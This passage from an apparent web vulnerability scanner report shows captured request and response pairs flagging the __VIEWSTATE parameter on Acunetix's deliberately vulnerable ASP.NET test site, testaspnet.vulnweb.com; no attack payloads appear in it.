href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8154&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgDAMTRzKdoIZGRkdHsBpI5Ln17zwfixfUIM076yRaQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLh0874AgK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPIcBS8GBczYLnyy9W5BaHIwca1k8%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:53:29 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgDAMTRzKdoIZGRkdHsBpI5Ln17zwfixfUIM076yRaQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLh0874AgK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPIcBS8GBczYLnyy9W5BaHIwca1k8=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:White" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1165 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,165 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8170&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgDAzdoFNtoIZGRkl66aPv9J9sQj7hKf03sTcdqiiE0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKu%2B6zKBwK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPzF%2B8sPYqF98SbM4YwGgPdshGS1Q%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:38:47 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgDAzdoFNtoIZGRkl66aPv9J9sQj7hKf03sTcdqiiE0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKu+6zKBwK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPzF+8sPYqF98SbM4YwGgPdshGS1Q=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:White" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a 